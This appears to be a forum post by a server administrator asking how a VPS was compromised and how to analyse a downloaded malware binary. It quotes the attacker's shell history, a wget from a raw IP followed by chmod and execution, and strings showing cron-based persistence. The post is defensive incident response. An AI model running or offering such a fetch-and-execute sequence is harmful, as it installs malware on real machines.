We got hacked, someone got access on our VPS machine. There are no ssh logs, there are no auth logs. There is no actual trace of remote access (that I could find and I'm not a security expert but I'm not a complete beginner either).
After a lot of digging we found that the root user have some new lines in /root/.bash_history, specifically these:
cd /var/lib/
wget http://88.198.27.53:1085/pklib
chmod +x pklib
./pklib
The pklib file is a binary. Running cat pklib turns a lot of gibberish and a couple of lines that resemble a manual http request
��,q��,q��,q���n��,q��,q��&o��,q��q��,q��,q��,q��,q��#q��CONNECT %s:%d HTTP/1.0
Host: %s:%d
200 OK%s%s%.2d/%.2d/%d %.2d:%.2d:%.2d%d%s%s%d%s%llu%s%s/?rbwb%d%s%llu%s%s%s/%s/proc/%i/exe/proc/self/cmdline%.4d-%.2d-%.2d %.2d:%.2d:%.2d%d%dhttp://%s%s%sGET %s HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Connection: close
/proc//proc/statbtime /proc/%s/stat%s (%[^)]/proc/%s/exe/dev/ptmx
exit
exit
/bin/sh/bin/bash/..//.///localhostUSERUnknownr/etc/version/etc/%s/etc/lsb-release/etc/redhat-release/proc/cpuinfomodel name,PATHHOME%s%s%s%s%llu%llu%llu%d%s%s%s%s%s%s%d%d%s%d%s%d%s%dcrontab -l 2>&1w/tmp/nctf.txt@reboot "%s"no crontab for crontab /tmp/nctf.txt 2>&1-m.Settings/tmp/.%srb+%Rand%-m "%s"E�2��^3�!���{16:%s;0:%llu:%s;%c%ll @�6%d%s%s%s%.2d/%.2d/%d %.2d:%.2d:%.2d%s--socket:[[0000]:/proc/proc/%s/fdfd//proc/net/tcp%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %X:%X %X:%X %X %d %d %d %512s
I tried run this script on a dummy machine (freshly created and empty) and the script just install itself on /root/.Install/Host.out and add a crontab entry to run this script on reboot
The machine where the binary was downloaded does not exist anymore, probably destroyed after our machine got infected. Since the script does http request (I think) I tried , without success, to run a sniffer to try and catch the requests content or at least the IPs it connects. It connects to a lot of machines and tcpdump can't find any useful thing (not http requests)
Now I have two questions:
- How can I debug this binary file and find out what it does?
- How the hacker got access on our machine?
My current goal is to find how the access happened, what the script does and how prevent such things from happening again
Footnotes if anyone is interested in the mystery:
ssd_configblocks root login and password loginauth.loghave a lot of attempts of login, with several users and without a single successUsers like: root, d3ftup, web, admin, game, unknown, book, etc
There are no other users created
The script did not create a new user and give access to it, running
sudo cat /etc/shadow | grep '^[^:]*:[^\*!]'return 2 users, root and myuser. root does not have ssh access and myuser is a restricted user that we use to upload updates
P.S.: I'm not sure if the title does justice to what I want, but is the closest I could think
